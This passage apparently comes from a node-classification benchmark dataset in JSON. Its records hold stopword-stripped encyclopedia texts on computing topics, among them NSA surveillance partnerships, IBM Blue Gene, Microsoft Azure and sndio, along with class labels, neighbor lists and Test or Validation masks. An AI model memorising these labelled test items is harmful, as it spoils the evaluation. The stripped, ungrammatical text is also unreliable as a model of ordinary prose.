world war ii formalized 1949 canusa agreement behalf nsa csec opened secret surveillance facilities 20 countries around world well communications security establishment canada revealed following global surveillance disclosures engaging surveillance wifi hotspots major canadian airports collecting meta-data use engaging surveillance travelers even days departure said airports politiets efterretningstjeneste pet denmark domestic intelligence agency exchanges data nsa regular basis part secret agreement united states one 9-eyes ukusa agreement denmark relationship nsa closer nsa relationship germany sweden spain belgium italy directorate-general external security dgse france maintains close relationship nsa gchq discussions increased cooperation began november 2006 early 2010s extent cooperation joint interception digital data dgse nsa noted increased dramatically 2011 formal memorandum data exchange signed dgse nsa facilitated transfer millions metadata records dgse nsa december 2012 8 january 2013 70 million metadata records handed nsa french intelligence agencies bundesnachrichtendienst bnd germany systematically transfers metadata german intelligence sources nsa december 2012 alone bnd provided nsa 500 million metadata records nsa granted bundesnachrichtendienst access x-keyscore exchange german surveillance programs mira4 veras early 2013 hans-georg maaßen president german domestic security agency bundesamt für verfassungsschutz bfv made several visits headquarters nsa according classified documents german government maaßen agreed transfer data records persons monitored germany bfv via xkeyscore nsa addition bfv works closely eight u.s. government agencies including cia project 6 jointly operated cia bfv bnd massive database containing personal information photos license plate numbers internet search histories telephone metadata developed gain better understanding social relationships presumed jihadists 2012 bfv handed 864 data sets personal information cia nsa seven u.s. intelligence agencies exchange bnd received data u.s. intelligence agencies 1,830 occasions newly acquired data handed bfv stored domestically accessible system known nadis wn israeli sigint national unit isnu routinely receives raw unfiltered data u.s. citizens nsa however secret nsa document leaked snowden revealed u.s. government officials explicitly exempted forms data sharing isnu stated memorandum detailing rules data sharing u.s. citizens isnu obligated according undated memorandum ground rules intelligence sharing nsa isnu laid march 2009 data sharing agreement isnu allowed retain identities u.s. citizens excluding u.s. government officials year 2011 nsa asked japanese government intercept underwater fibre-optic cables carrying phone internet data asia-pacific region however japanese government refused comply reign muammar gaddafi libyan regime forged partnership britain secret service mi6 u.s. central intelligence agency cia obtain information libyan dissidents living united states canada exchange gaddafi allowed western democracies use libya base extraordinary renditions algemene inlichtingen en veiligheidsdienst aivd netherlands receiving storing data internet users gathered u.s. intelligence sources nsa prism surveillance program meeting february 2013 aivd mivd briefed nsa attempts hack internet forums collect data users using technology known computer network exploitation cne norwegian intelligence service nis confirmed data collected agency shared americans kjell grandhagen head norwegian military intelligence told reporters news conference share information partners partners share us ... talking huge amounts traffic data cooperation nsa nis gained access russian targets kola peninsula civilian targets general nis provides information nsa politicians energy armament top secret memo nsa lists following years milestones norway-united states america signt agreement norus agreement nsa perceives nis one reliable partners agencies also cooperate crack encryption systems mutual targets according nsa norway made objections requests defence ministry singapore security intelligence division sid secretly intercepting much fibre optic cable traffic passing asian continent close cooperation australian signals directorate asd/dsd singapore sid able intercept sea-me-we 3 southeast asia-middle east-western europe 3 well sea-me-we 4 telecommunications cables access international telecommunications channels facilitated singapore government-owned operator singtel temasek holdings multibillion-dollar sovereign wealth fund majority stake singtel maintained close relations country intelligence agencies information gathered government singapore transferred government australia part intelligence sharing agreement allows five eyes maintain stranglehold communications across eastern hemisphere close cooperation centro nacional de inteligencia cni nsa intercepted 60.5 million phone calls spain single month försvarets radioanstalt fra sweden codenamed sardines allowed five eyes access underwater cables baltic sea 5 december 2013 sveriges television swedish television revealed fra conducting clandestine surveillance operation targeting internal politics russia operation conducted behalf nsa receives data handed fra according documents leaked snowden fra sweden granted access nsa international surveillance program xkeyscore federal intelligence service ndb switzerland exchanges information nsa regularly basis secret agreement circumvent domestic surveillance restrictions addition nsa granted access swiss surveillance facilities leuk canton valais herrenschwanden canton bern part swiss surveillance program onyx according ndb agency maintains working relationships 100 international organizations however ndb denied form cooperation nsa although nsa direct access switzerland onyx surveillance program director ndb acknowledged possible u.s. intelligence agencies gain access switzerland surveillance system british government allowed nsa store personal data british citizens project minaret anti-vietnam war dissidents united states jointly targeted gchq nsa cia pays us 10 million year gain access international phone records including u.s. citizens nsa foreign affairs directorate interacts foreign intelligence services members five eyes implement global surveillance fbi acts liaison u.s. intelligence agencies silicon valley giants microsoft early 2010s dhs conducted joint surveillance operation fbi crack dissidents occupy wall street protest movement nsa supplies domestic intercepts drug enforcement administration dea internal revenue service irs law enforcement agencies use intercepted data initiate criminal investigations us citizens federal agents instructed recreate investigative trail order cover information originated weeks september 11 attacks u.s. president george w. bush signed patriot act ensure disruption government ability conduct global surveillance patriot act extended u.s. president barack obama may 2011 extend federal government legal authority conduct additional forms surveillance roving wiretaps 70 percent united states intelligence community budget earmarked payment private firms according forbes magazine defense technology company lockheed martin currently usa biggest defense contractor destined nsa powerful commercial partner biggest contractor terms dollar revenue joint operation nsa american telecommunications corporation operates room 641a sbc communications building san francisco spy internet traffic cia pays us 10 million year gain access international phone records including u.s. citizens projects developed booz allen hamilton include strategic innovation group identify terrorists social media behalf government agencies fiscal year 2013 booz allen hamilton derived 99 income government largest portion revenue coming u.s. army 2013 booz allen hamilton hailed bloomberg businessweek world profitable spy organization british telecommunications code-named remedy major supplier telecommunications granted britain intelligence agency gchq unlimited access network undersea cables according documents leaked snowden american multinational corporation microsoft helped nsa circumvent software encryption safeguards also allowed federal government monitor web chats outlook.com portal 2013 microsoft worked fbi allow nsa gain access company cloud storage service skydrive french telecommunications corporation orange s.a. shares customer call data french intelligence agency dgse intercepted data handed gchq rsa security paid us 10 million nsa introduce cryptographic backdoor encryption products strategic forecasting inc. commonly known stratfor global intelligence company offering information governments private clients including dow chemical company lockheed martin northrop grumman raytheon u.s. department homeland security u.s. defense intelligence agency u.s. marine corps british telecommunications company vodafone code-named gerontic granted britain intelligence agency gchq unlimited access network undersea cables according documents leaked snowden in-q-tel receives us 56 million year government support venture capital firm enables cia invest silicon valley palantir technologies data mining corporation close ties fbi nsa cia based palo alto california company developed data collection analytical program known prism 2011 revealed company conducted surveillance glenn greenwald several countries evaded global surveillance constructing secret bunker facilities deep earth surface despite north korea priority target nsa internal documents acknowledged know much kim jong un regime intentions october 2012 iran police chief esmail ahmadi moghaddam alleged google search engine spying tool western intelligence agencies six months later april 2013 country announced plans introduce islamic google earth evade global surveillance libya evaded surveillance building hardened buried bunkers least 40 feet ground level global surveillance disclosure caused tension bilateral relations united states several allies economic partners well relationship european union 12 august 2013 president obama announced creation independent panel outside experts review nsa surveillance programs panel due established director national intelligence james r. clapper consult provide assistance according survey undertaken human rights group pen international disclosures chilling effect american writers fearing risk targeted government surveillance 28 pen american members curbed usage social media 16 self-censored avoiding controversial topics writings",
    "neighbors": [
      2818,
      9732,
      1930,
      3599,
      3088,
      1169,
      3730,
      3858,
      8978,
      1941,
      9233,
      10002,
      10525,
      8735,
      2208,
      1189,
      3111,
      3495,
      3880,
      9260,
      9901,
      1838,
      6455,
      10935,
      1083,
      5180,
      6344,
      7759,
      208,
      7887,
      7893,
      1368,
      9688,
      8156,
      488,
      3305,
      2154,
      107,
      3948,
      4595,
      5749,
      3703,
      2428
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1931,
    "label": 9,
    "text": "Comparison_of_programming_languages_(list_comprehension):comparison programming languages list comprehension list comprehension syntactic construct available programming languages creating list based existing lists follows form mathematical set-builder notation set comprehension distinct use map filter functions list doubles 0 10 exclusive list names customers based rio de janeiro previous code syntactic sugar following code written using lambda expressions filtering numbers divisible 3 multiple generators infinite lazy sequence list comprehension using multiple generators list comprehensions expressed codice_1 macro codice_2 keyword conditionals expressed codice_3 follows list names customers list customers balances list names customers balances general forms note putting condition expression variable name enumerable object editors ides provide autocompletion members variable lazily-evaluated sequences floating point values lists arrays list comprehensions part greater family language constructs called computation expressions example list comprehension using multiple generators using range object io language create list easy languages list comprehensions expressed codice_4 special form conditionals expressed codice_3 follows java 8 introduces new streams api includes intstream interface allows operations like following julia supports comprehensions using syntax multidimensional comprehensions like 2*i 1..100 i*i 3 multiple generators ocaml supports list comprehension ocaml batteries 2 ** 2 3 0 .. 99 python uses following syntax express list comprehensions finite lists generator expression may used python versions 2.4 gives lazy evaluation input used generators iterate 'infinite input count generator function returns successive integers subsequent use generator expression determine stop generating values example multiple generators using for-comprehension list comprehensions supported scheme use srfi-42 library example list comprehension using multiple generators 2*x || x list :getmember_nd l x*x 3 short-hand notation",
    "neighbors": [
      10752,
      3462,
      6536,
      2062,
      6414,
      6160,
      5521,
      9871,
      10510,
      3736,
      155,
      5917,
      9245,
      3876,
      5796,
      5677,
      5806,
      9008,
      1203,
      3765,
      7479,
      6074,
      10043,
      10684,
      6718,
      963,
      10435,
      8262,
      5833,
      1610,
      1611,
      5961,
      3577,
      8397,
      9804,
      11212,
      7889,
      11219,
      5588,
      7894,
      4057,
      10586,
      11610,
      10083,
      4069,
      11497,
      2666,
      7274,
      8554,
      6640,
      1016,
      3705
    ],
    "mask": "Test"
  },
  {
    "node_id": 1932,
    "label": 2,
    "text": "Sndio:sndio sndio software layer openbsd operating system manages sound cards midi ports provides optional sound server documented application programming interface access either server audio midi hardware uniform way sndio designed work desktop applications pays special attention synchronization mechanisms reliability required music applications audio midi server main component sndio aims fill gap programs requirements bare hardware exposed operating system device drivers includes last points hooks sound server aiming improve interoperability audio midi programs use standard midi protocols volume synchronization control enables interoperability midi software hardware connected computer minimal server capabilities added —an audio stream manipulation tool predecessor —in october 2008 shipping openbsd 4.5 december 2011 renamed later shipped openbsd 5.1 default sound server started operating system boot",
    "neighbors": [
      1668,
      9223,
      10631,
      2825,
      3465,
      274,
      7702,
      10105,
      8621,
      6702,
      7983,
      9520,
      823,
      2245,
      1993,
      8778,
      3404,
      11086,
      593,
      5970,
      5084,
      2908,
      7139,
      1637,
      4071,
      5230,
      1785,
      8954,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1933,
    "label": 3,
    "text": "IBM_Blue_Gene:ibm blue gene blue gene ibm project aimed designing supercomputers reach operating speeds petaflops pflops range low power consumption project created three generations supercomputers blue gene/l blue gene/p blue gene/q blue gene systems often led top500 green500 rankings powerful power efficient supercomputers respectively blue gene systems also consistently scored top positions graph500 list project awarded 2009 national medal technology innovation 2015 ibm seems ended development blue gene family though public announcement made ibm continuing efforts supercomputer scene seems concentrated around openpower using accelerators fpgas gpus battle end moore law december 1999 ibm announced us 100 million research initiative five-year effort build massively parallel computer applied study biomolecular phenomena protein folding project two main goals advance understanding mechanisms behind protein folding via large-scale simulation explore novel ideas massively parallel machine architecture software major areas investigation included use novel platform effectively meet scientific goals make massively parallel machines usable achieve performance targets reasonable cost novel machine architectures initial design blue gene based early version cyclops64 architecture designed monty denneau initial research development work pursued ibm t.j. watson research center led william r. pulleyblank ibm alan gara started working extension qcdoc architecture general-purpose supercomputer 4d nearest-neighbor interconnection network replaced network supporting routing messages node parallel i/o subsystem added doe started funding development system became known blue gene/l l light development original blue gene system continued name blue gene/c c cyclops later cyclops64 november 2004 16-rack system rack holding 1,024 compute nodes achieved first place top500 list linpack performance 70.72 tflops thereby overtook nec earth simulator held title fastest computer world since 2002 2004 2007 blue gene/l installation llnl gradually expanded 104 racks achieving 478 tflops linpack 596 tflops peak llnl bluegene/l installation held first position top500 list 3.5 years june 2008 overtaken ibm cell-based roadrunner system los alamos national laboratory first system surpass 1 petaflops mark system built rochester mn ibm plant llnl installation largest blue gene/l installation many smaller installations followed november 2006 27 computers top500 list using blue gene/l architecture computers listed architecture eserver blue gene solution example three racks blue gene/l housed san diego supercomputer center top500 measures performance single benchmark application linpack blue gene/l also set records performance wider set applications blue gene/l first supercomputer ever run 100 tflops sustained real-world application namely three-dimensional molecular dynamics code ddcmd simulating solidification nucleation growth processes molten metal high pressure temperature conditions achievement 2005 gordon bell prize june 2006 nnsa ibm announced blue gene/l achieved 207.3 tflops quantum chemical application qbox supercomputing 2006 blue gene/l awarded winning prize hpc challenge classes awards 2007 team ibm almaden research center university nevada ran artificial neural network almost half complex brain mouse equivalent second network run 1/10 normal speed 10 seconds name blue gene comes originally designed help biologists understand processes protein folding gene development blue traditional moniker ibm uses many products company original blue gene design renamed blue gene/c eventually cyclops64 l blue gene/l comes light design original name blue light p version designed petascale design q letter p blue gene/r blue gene/l supercomputer unique following aspects blue gene/l architecture evolution qcdsp qcdoc architectures blue gene/l compute i/o node single asic associated dram memory chips asic integrated two 700 mhz powerpc 440 embedded processors double-pipeline-double-precision floating point unit fpu cache sub-system built-in dram controller logic support multiple communication sub-systems dual fpus gave blue gene/l node theoretical peak performance 5.6 gflops gigaflops two cpus cache coherent one another compute nodes packaged two per compute card 16 compute cards plus 2 i/o nodes per node board 32 node boards per cabinet/rack integration essential sub-systems single chip use low-power logic compute i/o node dissipated low power 17 watts including drams allowed aggressive packaging 1024 compute nodes plus additional i/o nodes standard 19-inch rack within reasonable limits electrical power supply air cooling performance metrics terms flops per watt flops per floorspace flops per unit cost allowed scaling high performance many nodes component failures inevitable system able electrically isolate faulty components granularity half rack 512 compute nodes allow machine continue run blue gene/l node attached three parallel communications networks 3d toroidal network peer-to-peer communication compute nodes collective network collective communication broadcasts reduce operations global interrupt network fast barriers i/o nodes run linux operating system provided communication storage external hosts via ethernet network i/o nodes handled filesystem operations behalf compute nodes finally separate private ethernet network provided access node configuration booting diagnostics allow multiple programs run concurrently blue gene/l system could partitioned electronically isolated sets nodes number nodes partition positive integer power 2 least 2 32 nodes run program blue gene/l partition computer first reserved program loaded run nodes within partition program could access nodes within partition use upon completion partition nodes released future programs use blue gene/l compute nodes used minimal operating system supporting single user program subset posix calls supported one process could run time node co-processor mode—or one process per cpu virtual mode programmers needed implement green threads order simulate local concurrency application development usually performed c c++ fortran using mpi communication however scripting languages ruby python ported compute nodes june 2007 ibm unveiled blue gene/p second generation blue gene series supercomputers designed collaboration included ibm llnl argonne national laboratory leadership computing facility design blue gene/p technology evolution blue gene/l blue gene/p compute chip contains four powerpc 450 processor cores running 850 mhz cores cache coherent chip operate 4-way symmetric multiprocessor smp memory subsystem chip consists small private l2 caches central shared 8 mb l3 cache dual ddr2 memory controllers chip also integrates logic node-to-node communication using network topologies blue gene/l twice bandwidth compute card contains blue gene/p chip 2 4 gb dram comprising compute node single compute node peak performance 13.6 gflops 32 compute cards plugged air-cooled node board rack contains 32 node boards thus 1024 nodes 4096 processor cores using many small low-power densely packaged chips blue gene/p exceeded power efficiency supercomputers generation 371 mflops/w blue gene/p installations ranked near top green500 lists 2007-2008 following incomplete list blue gene/p installations per november 2009 top500 list contained 15 blue gene/p installations 2-racks 2048 nodes 8192 processor cores 23.86 tflops linpack larger third supercomputer design blue gene series blue gene/q peak performance 20 petaflops reaching linpack benchmarks performance 17 petaflops blue gene/q continues expand enhance blue gene/l /p architectures blue gene/q compute chip 18 core chip 64-bit a2 processor cores 4-way simultaneously multithreaded run 1.6 ghz processor core simd quad-vector double precision floating point unit ibm qpx 16 processor cores used computing 17th core operating system assist functions interrupts asynchronous i/o mpi pacing ras 18th core used redundant spare used increase manufacturing yield spared-out core shut functional operation processor cores linked crossbar switch 32 mb edram l2 cache operating half core speed l2 cache multi-versioned supporting transactional memory speculative execution hardware support atomic operations l2 cache misses handled two built-in ddr3 memory controllers running 1.33 ghz chip also integrates logic chip-to-chip communications 5d torus configuration 2gb/s chip-to-chip links blue gene/q chip manufactured ibm copper soi process 45 nm delivers peak performance 204.8 gflops 1.6 ghz drawing 55 watts chip measures 19×19 mm 359.5 mm² comprises 1.47 billion transistors chip mounted compute card along 16 gb ddr3 dram i.e. 1 gb user processor core q32 compute drawer contains 32 compute cards water cooled midplane crate contains 16 q32 compute drawers total 512 compute nodes electrically interconnected 5d torus configuration 4x4x4x4x2 beyond midplane level connections optical racks two midplanes thus 32 compute drawers total 1024 compute nodes 16,384 user cores 16 tb ram separate i/o drawers placed top rack separate rack air cooled contain 8 compute cards 8 pcie expansion slots infiniband 10 gigabit ethernet networking time blue gene/q system announcement november 2011 initial 4-rack blue gene/q system 4096 nodes 65536 user processor cores achieved 17 top500 list 677.1 teraflops linpack outperforming original 2007 104-rack bluegene/l installation described 4-rack system achieved top position graph500 list 250 gteps giga traversed edges per second blue gene/q systems also topped green500 list energy efficient supercomputers 2.1 gflops/w june 2012 blue gene/q installations took top positions three lists top500 graph500 green500 following incomplete list blue gene/q installations per june 2012 top500 list contained 20 blue gene/q installations 1/2-rack 512 nodes 8192 processor cores 86.35 tflops linpack larger size-independent power efficiency 2.1 gflops/w systems also populated top june 2012 green 500 list record-breaking science applications run bg/q first cross 10 petaflops sustained performance cosmology simulation framework hacc achieved almost 14 petaflops 3.6 trillion particle benchmark run cardioid code models electrophysiology human heart achieved nearly 12 petaflops near real-time simulation sequoia fully compressible flow solver also achieved 14.4 pflop/s originally 11 pflop/s sequoia 72 machine nominal peak performance",
    "neighbors": [
      3328,
      9472,
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      11661,
      1168,
      3472,
      4881,
      10641,
      5015,
      7065,
      1563,
      1309,
      9245,
      3493,
      6949,
      6311,
      8102,
      1321,
      10411,
      1454,
      4270,
      7983,
      4017,
      5297,
      7218,
      10543,
      1461,
      823,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10051,
      10180,
      1480,
      7497,
      5965,
      3323,
      336,
      5457,
      8530,
      3540,
      342,
      2135,
      9302,
      2394,
      3677,
      6878,
      11613,
      2273,
      1635,
      869,
      10214,
      8554,
      7022,
      8815,
      10734,
      3185,
      4211,
      5235,
      3960,
      8058,
      2811,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1934,
    "label": 4,
    "text": "Holistic_Information_Security_Practitioner:holistic information security practitioner holistic information security practitioner certification course integration course provides practical education integration best practices information security management information systems auditing multiple regulatory compliance requirements well map multiple regulatory requirements internationally accepted framework iso/iec 27002 class introduces iso/iec 27002:2013 cobit coso itil explains methodology map regulations data protection act 1998 uk eu directive privacy basel ii hipaa u.s. federal financial institutions examination council glb act fips 200 sarbanes-oxley fact act pci data security california sb 1386 osfi pipeda pipa canadian bill c-168 iso 27002 framework holistic information security practitioner hisp certification course originally authored efortresses inc. atlanta georgia-based cyber security governance risk management compliance solutions company specializing information security regulatory compliance training aspect hisp certification course delivered efortresses number authorized training partners including bsi management systems currently training certification aspect managed exclusively holistic information security practitioner institute independently run organization holistic information security practitioner institute also oversight body cloud assurance assessor program caap caap provides assurance qualifications purporting necessary skills independent cloud assessors",
    "neighbors": [
      5133,
      3447
    ],
    "mask": "Test"
  },
  {
    "node_id": 1935,
    "label": 7,
    "text": "Microsoft_Azure:microsoft azure microsoft azure formerly windows azure cloud computing service created microsoft building testing deploying managing applications services microsoft-managed data centers provides software service saas platform service paas infrastructure service iaas supports many different programming languages tools frameworks including microsoft-specific third-party software systems azure announced october 2008 started codename project red dog released february 1 2010 windows azure renamed microsoft azure march 25 2014 microsoft lists 600 azure services covered microsoft azure service bus allows applications running azure premises premises devices communicate azure helps build scalable reliable applications service-oriented architecture soa azure service bus supports four different types communication mechanisms paas offering used encoding content protection streaming analytics global content delivery network cdn audio video applications images static files used cache static assets websites geographically closer users increase performance network managed rest based http api azure 54 point presence locations worldwide also known edge locations august 2018 azure blockchain workbench microsoft providing required infrastructure setup consortium network multiple topologies using variety consensus mechanisms microsoft provides integration blockchain platforms microsoft services streamline development distributed applications microsoft supports many general-purpose blockchains including ethereum hyperledger fabric purpose-built blockchains like corda azure functions used serverless computing architectures subscribers execute code function-as-a-service faas without managing underlying server resources azure generally available 42 regions around world microsoft announced additional 12 regions opened soon october 2018 microsoft first hyper-scale cloud provider committed building facilities continent africa two regions located south africa azure geography contains multiple azure regions example “ north europe ” dublin ireland “ west europe ” amsterdam netherlands location represents city area azure region azure region paired another region within geography makes regional pair example amsterdam dublin locations form regional-pair microsoft gold partners available across globe sell products august 2018 toyota tsusho began partnership microsoft create fish farming tools using microsoft azure application suite iot technologies related water management developed part researchers kindai university water pump mechanisms use artificial intelligence count number fish conveyor belt analyze number fish deduce effectiveness water flow data fish provide specific computer programs used process fall azure machine learning azure iot hub platforms microsoft azure uses specialized operating system called microsoft azure run fabric layer cluster hosted microsoft data centers manages computing storage resources computers provisions resources subset applications running top microsoft azure microsoft azure described cloud layer top number windows server systems use windows server 2008 customized version hyper-v known microsoft azure hypervisor provide virtualization services scaling reliability controlled microsoft azure fabric controller ensures services environment fail one servers fails within microsoft data center also provides management user web application memory allocation load balancing azure provides api built rest http xml allows developer interact services provided microsoft azure microsoft also provides client-side managed class library encapsulates functions interacting services also integrates microsoft visual studio git eclipse addition interacting services via api users manage azure services using web-based azure portal reached general availability december 2015 portal allows users browse active resources modify settings launch new resources view basic monitoring data active virtual machines services advanced azure management services available microsoft azure offers two deployment models cloud resources classic deployment model azure resource manager classic model azure resource virtual machine sql database etc managed individually azure resource manager introduced 2014 enables users create groups related services closely coupled resources deployed managed monitored together microsoft stated per usa patriot act us government could access data even hosted company american data resides outside usa however microsoft azure compliant e.u data protection directive 95/46/ec manage privacy security-related concerns microsoft created microsoft azure trust center microsoft azure several services compliant several compliance programs including hipaa full current listing found microsoft azure trust center compliance page special note microsoft azure granted jab provisional authority operate p-ato u.s. government accordance guidelines spelled federal risk authorization management program fedramp u.s. government program provides standardized approach security assessment authorization continuous monitoring cloud services used federal government following list microsoft azure outages service disruptions",
    "neighbors": [
      1539,
      6150,
      4107,
      526,
      4623,
      18,
      3605,
      10265,
      3614,
      5662,
      5666,
      2085,
      9766,
      39,
      5159,
      6190,
      7215,
      3121,
      5681,
      8757,
      64,
      10820,
      582,
      8262,
      4683,
      590,
      1102,
      7248,
      2641,
      5202,
      9812,
      1628,
      94,
      4704,
      4194,
      10338,
      5732,
      9828,
      1638,
      617,
      9839,
      7796,
      6265,
      2170,
      127,
      9344,
      2689,
      10368,
      10887,
      4236,
      6797,
      10893,
      10900,
      9365,
      3224,
      4761,
      8346,
      7838,
      6307,
      5800,
      1705,
      2217,
      6827,
      5295,
      8367,
      9906,
      7347,
      9396,
      6327,
      7352,
      10428,
      3262,
      6846,
      7359,
      4289,
      194,
      7364,
      3269,
      1224,
      10957,
      4816,
      7889,
      7891,
      5332,
      3800,
      8921,
      6367,
      740,
      9448,
      2795,
      3819,
      6383,
      1266,
      4853,
      764,
      253,
      8446,
      259,
      4356,
      8451,
      8965,
      11524,
      11016,
      782,
      272,
      3862,
      11030,
      2328,
      4377,
      2842,
      8475,
      8986,
      11549,
      11038,
      7456,
      7970,
      3875,
      4388,
      11559,
      1832,
      6441,
      6444,
      3886,
      7983,
      1840,
      3376,
      3890,
      8495,
      11060,
      3894,
      823,
      11577,
      11070,
      8515,
      3909,
      5960,
      8520,
      9033,
      4428,
      4429,
      5966,
      6476,
      1362,
      11605,
      4439,
      7512,
      9562,
      8539,
      11103,
      3428,
      2919,
      10088,
      8554,
      10090,
      8044,
      7022,
      7537,
      9585,
      1907,
      6522,
      5499,
      1916,
      11646,
      2944,
      5504,
      6018,
      7043,
      10120,
      6027,
      911,
      8592,
      9104,
      405,
      2965,
      5526,
      5528,
      3993,
      922,
      4505,
      929,
      11178,
      1964,
      11692,
      4020,
      9655,
      6073,
      10681,
      448,
      2496,
      11201,
      8644,
      3527,
      5066,
      3531,
      5070,
      9682,
      467,
      2004,
      4051,
      5587,
      11221,
      10200,
      6618,
      479,
      3042,
      1507,
      6632,
      1001,
      8170,
      8681,
      7660,
      4604,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 1936,
    "label": 9,
    "text": "Benjamin_C._Pierce:benjamin c. pierce benjamin crawford pierce henry salvatori professor computer science university pennsylvania pierce joined penn 1998 indiana university held research positions university cambridge university edinburgh received ph.d. carnegie mellon university 1991 research includes work programming languages static type systems distributed programming mobile agents process calculi part research pierce led development several open-source software projects including unison file synchronization utility author one book type systems types programming languages also edited collection articles create second volume advanced topics types programming languages based notes collected learning category theory phd also published introductory book topic— basic category theory computer scientists one authors freely available book software foundations",
    "neighbors": [
      7394,
      8924,
      8324,
      8262,
      10246,
      7468,
      369,
      5585,
      7734,
      1783,
      9914,
      10043,
      4572
    ],
    "mask": "Test"
  },
  {
    "node_id": 1937,
    "label": 8,
    "text": "Monkey_HTTP_Server:monkey http server monkey http server optimized web server linux designed achieve high performance high loads making linux kernel terms specific system calls optimization techniques http/1.1 compliant rfc 2616 supports common features ipv6 tls virtual hosts cgi fastcgi directory listing security rules server designed small core extensible plugin interface binary size monkey around 100 kb around 250 kb runtime depending loaded plugins monkey perform well x86 x86-64 arm architectures running linux embedded variants monkey started 2001 open source project currently licensed apache license v2 monkey community well established available mailing list freenode irc channel monkey",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      7443,
      1556,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      6436,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      2485,
      823,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      5470,
      225,
      865,
      1250,
      2404,
      4837,
      6379,
      5356,
      9580,
      9964,
      2287,
      11376,
      499,
      8691,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 1938,
    "label": 1,
    "text": "National_Security_Database:national security database national security database official accreditation program india awarded information security experts deemed credible trustworthy proven skills protect national critical infrastructure economy country program developed 'information sharing analysis center isac jointly support government india multiple speciality domains information security professionals apply empanelment database clearing technical lab examination psychometric test program award certification provides credible recognition form empanelment database specific security domain project conceived 2008 mumbai attacks protect national critical infrastructure cyber space india program founded rajshekhar murthy non-profit section 25 company 'information sharing analysis center support highly specialised technical intelligence agency ntro government india earlier program announced pilot international malware conference malcon 2010 mumbai indian government officials reportedly asked indian hackers learn chinese program released 26 november date 2008 mumbai attacks international malware conference malcon jw marriott mumbai program inaugurated shri sachin pilot minister state ministry communications information technology empanelment database applied indian citizens limited access available industry benefit list credible experts however major part database access restricted supporting indian government organisations 'the program largely believed identify professional ethical hackers security experts government india protect critical infrastructure cyber space minister kapil sibal reportedly expressed need community ethical hackers alok vijayant director information dominance group national technical research organisation nation ’ chief technical intelligence monitoring authority quoted interview india top weekly magazine outlook nsd “ trivialised ” describing group hackers “ supported government industry nsd good initiative since provide readymade database credible security professionals information security domain individuals skills companies tend regularly move one firm another nsd officially endorsed multiple indian government organisations cert-in ntro stated national objectives recognition foundation declared support work done collaboration open supporting organisations need access database formal mou body various organisations actively participating supporting national security database notable organisations voluntary representations governing nsd advisory panel national level include honeynet india chapter microsoft india country oldest security conference clubhack national security database program following speciality domains professionals apply empanelment quote outlook magazine director isac rajshekhar murthy stated necessary people competent also high degree trustworthiness integrity selection process involve examination references technical skills criminal history even psychological assessment generate credit report security clearance. ” national security database academy national security database certification ethical hacking penetration testing kali",
    "neighbors": [
      6473
    ],
    "mask": "Test"
  },
  {
    "node_id": 1939,
    "label": 2,
    "text": "Alexandre_Oliva:alexandre oliva alexandre alex oliva brazilian free software activist developer founding member free software foundation latin america fsfla currently on-hold phd studies institute computing state university campinas brazil whilst working compiler engineer red hat contributing gcc compiler maintainer linux-libre fork linux kernel removes non-free software components binary blobs kernel linux-libre kernels used linux distributions gnewsense trisquel blag recommended free software foundation gnu project 2008 oliva translated produced porco e caixa brazilian portuguese translation pig box creative commons-licensed book teaches perils drm children 10,000 copies eventually printed fisl conference porto alegre brazil official gnu free software speaker",
    "neighbors": [
      1026,
      2050,
      1028,
      5644,
      2581,
      3618,
      6691,
      59,
      2109,
      8258,
      10822,
      5703,
      8263,
      589,
      4177,
      8787,
      1112,
      3674,
      10860,
      8304,
      7793,
      3189,
      5759,
      2180,
      4230,
      9865,
      8848,
      657,
      6808,
      6302,
      3744,
      8354,
      4265,
      8364,
      1717,
      2233,
      5833,
      6352,
      3802,
      4831,
      7904,
      10464,
      3817,
      9455,
      8436,
      4367,
      7450,
      2332,
      10012,
      802,
      5410,
      6947,
      5931,
      6962,
      823,
      11069,
      843,
      11602,
      4437,
      6489,
      9579,
      1394,
      1396,
      11643,
      11654,
      4493,
      10642,
      3478,
      7584,
      11180,
      5555,
      9148,
      10687,
      4561,
      8147,
      2010,
      9696,
      8673,
      11232,
      1007,
      3068
    ],
    "mask": "Test"
  },
  {
    "node_id": 1940,
    "label": 6,
    "text": "KGB_Archiver:kgb archiver kgb archiver discontinued file archiver data compression utility employs paq6 compression algorithm written visual c++ tomasz pawlak kgb archiver designed achieve high compression ratio ten levels compression weak maximum however higher compression levels time required compress file increases significantly consequence program uses memory cpu intensively kgb archiver free open-source released terms gnu general public license version 2 beta 2 available microsoft windows command-line version kgb archiver 1.0 available unix-like operating systems minimum requirements running kgb archiver",
    "neighbors": [
      6022,
      1801,
      10121,
      1420,
      6797,
      5397,
      3222,
      9880,
      9762,
      3114,
      10027,
      2095,
      7983,
      950,
      4406,
      6713,
      10817,
      2755,
      11076,
      1352,
      4296,
      3659,
      10317,
      4174,
      10575,
      4561,
      722,
      3804,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      5096,
      7529,
      10857,
      4459,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 1941,
    "label": 4,
